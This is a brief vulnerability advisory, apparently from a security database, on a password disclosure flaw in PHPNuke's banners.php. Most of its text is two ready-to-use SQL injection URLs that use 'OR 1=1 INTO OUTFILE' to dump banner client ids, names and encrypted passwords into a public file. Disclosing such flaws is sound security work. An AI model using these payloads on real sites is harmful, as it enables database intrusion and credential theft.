|
PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability
The following exploit information was provided by Frog Man <leseulfrog@hotmail.com>: This will save id, name and crypted password into http://www.example.com/banners1.txt : http://www.example.com/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt This will save crypted password into http://[target]/banners2.txt : http://www.example.com/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt |
|
Privacy Statement |